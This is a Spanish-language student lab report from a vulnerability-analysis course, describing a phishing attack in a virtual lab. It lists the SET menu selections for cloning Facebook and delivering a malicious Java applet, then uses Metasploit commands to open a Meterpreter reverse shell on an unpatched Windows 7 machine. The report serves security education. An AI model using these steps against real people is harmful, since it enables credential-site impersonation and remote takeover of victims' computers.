Sunteți pe pagina 1din 16

Alumno

Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

Actividad

“Realizar un ataque de phishing”

Esta actividad consiste en realizar un ataque de phishing empleando una distribución de


Kali, a una máquina virtual con Windows.

Consideraciones del ataque:


 Clonación de página web de “Facebook”.
 Utilizar la herramienta SET y Metasploit para cargar un “Java Applet”.
 Las capturas de pantalla deben contener el nombre del alumno.

1 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

Tabla de contenido

OBJETIVO ......................................................................................................................3

INTRODUCCIÓN ..........................................................................................................3

DESARROLLO................................................................................................................3

1. REQUERIMIENTOS PREVIOS...........................................................................3

1.1. CREDENCIALES DE AUTENTICACIÓN .......................................................4

1.2. VISIBILIDAD ENTRE EQUIPOS ...................................................................4

1.3. PREPARACIÓN DE ATAQUE ...........................................................................5

1.4. OPCIONES PARA CONFIGURAR EL ATAQUE. .........................................6

1.5. CONFIGURACIÓN DE EQUIPO VICTIMA ..................................................8

1.6. MATERIALIZACIÓN DEL ATAQUE. ............................................................ 10

1.7. INTERACCIÓN ATACANTE- VICTIMA CON LA SHELL REVERSE.... 13

CONCLUSIÓN ............................................................................................................. 16

2 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

Objetivo
El objetivo de esta actividad es realizar un ataque de “Phishing”, empleando el “Social
Engineering Toolkit” en adelante por sus iniciales SET y metasploit, para generar un
Applet de Java, considerando un equipo Windows como víctima.

Introducción
A continuación, se enlistarán los pasos que se siguieron para el desarrollo e la actividad,
representados por las imágenes ilustrativas.

Desarrollo

1. Requerimientos previos

Para realizar la siguiente práctica, es necesario descargar una distribución de la suite de


herramientas de ataque “Kali”, la cual está disponible en: https://www.kali.org/.

En mi caso seleccioné la versión que contiene la máquina virtual.

Nota importante:
Para la víctima, quisiera comentar que traté con varias versiones de Windows (10, 8 y 7),
pero solo me funcionó el ataque con una máquina virtual con Windows 7 SP1 con el
3 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

navegador firefox y para que funcionara correctamente sin alertarme de los parches de
seguridad “cambie la fecha del BIOS de mi maquina al 4 de junio de 2017”.

1.1. Credenciales de autenticación


Las credenciales para acceder a la máquina virtual de “Kali” son:
User: root
Password: toor

1.2. Visibilidad entre equipos


A continuación, identificaremos las direcciones IP que tiene cada uno de los equipos

Atacante (Kali)

4 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

Victima (Windows)

1.3. Preparación de ataque

Tal como se mencionó en la introducción, el requerimiento para la ejecución de este


ataque se realizará con “SET”, para iniciar la suite necesitamos escribir en modo root
“setoolkit”.

5 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

1.4. Opciones para configurar el ataque.

En el listado siguiente se indican las opciones que deben seleccionarse en cada una de
las pantallas para configurar el ataque.

 1) Social-Engineering Attacks
 2) Website Attack Vectors
 1) Java Applet Attack Method
 2) Site Cloner
 Are you using NAT/Port Forwarding [yes|no]: no
IP address or hostname for the reverse connection:
En este campo escribiremos la IP de nuestro Kali (Atacante) 192.168.31.128
 2. Use the applet built into SET.
 webattack> Enter the url to clone: www.facebook.com
6 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

 1) Meterpreter Memory Injection (DEFAULT)


 PORT of the listener [443]: “Presionar Enter para aceptar el número de puerto”
 1) Windows Meterpreter Reverse TCP

Si se siguieron las instrucciones anteriores deberíamos tener una copia que se empleará
para engañar a la víctima del sitio de www.facebook.com y el applet de java con el que
conseguiremos la Shell reverse.

7 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

1.5. Configuración de equipo victima


Para que el ataque sea exitoso necesitamos de un navegador que no tenga las
actualizaciones de seguridad, en nuestro caso emplearemos un Firefox, con Java versión
8 Update 131 y una configuración de confianza, la cual se mostrará más adelante.

8 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

En la pestaña de configuración de java, es necesario incluir en los sitios de confianza la


dirección IP de nuestro Kali.

9 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

1.6. Materialización del ataque.


En esta sección se ejecutará el ataque, recordando que las direcciones IP involucradas
son:
 Atacante: 192.168.31.128
 Víctima: 192.168.31.129

Como nos lo indica la teoría, es necesario que engañemos a la victima a través de un


correo electrónico para que de clic a nuestro vinculo malicioso (Kali), usando en
navegador firefox.

10 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

Después de abrir el link, el navegador aparentemente nos llevará a www.facebook.com y


nos desplegará unas alertas, las cuales debemos aceptar para a ejecución del applet de
java malicioso.

11 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

A continuación de que ejecutamos el Applet malicioso, el usuario será redireccionado al


verdadero sitio de Facebook.

12 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

1.7. Interacción atacante- victima con la Shell


reverse

Al revisar las sesiones activas en nuestro Kali observaremos la sesión activa en el equipo
Windows, con las propiedades que seleccionamos al configurar el ataque (puerto 443
TCP).

13 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

Para interactuar con la victima a través de la sesión utilizaremos la siguiente línea de


comandos: “sessions -i 2”

14 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

Ahora que tenemos interacción con la sesión activa, solo nos queda inicializar el modo
de intercambio de comandos con la siguiente línea de comandos: “shell”

Como se observa en la imagen anterior, ya es posible ejecutar comandos en el equipo


víctima.

15 | 16
Alumno
Análisis de
Vulnerabilidades Reyes Correa Guillermo 04/12/2017

Conclusión
En este trabajo se demostraron los pasos para realizar un ataque de Phising a un usuario,
empleando el sitio de www.facebook.com, lo cual con el simple hecho de visitar nuestro
link, nos permite tomar el control de la víctima usando una Shell reversa, sin embargo
para que este ataque fuera exitoso, solo fue posible realizarlo con una versión vieja del
navegador Firefox y Windows sin parches de seguridad y ayudar un poco con la
configuración de confianza en la victima.

Con lo cual concluyo que no es tan trivial, al menos para mí materializar este tipo de
ataques.
--Fin de archivo

16 | 16

S-ar putea să vă placă și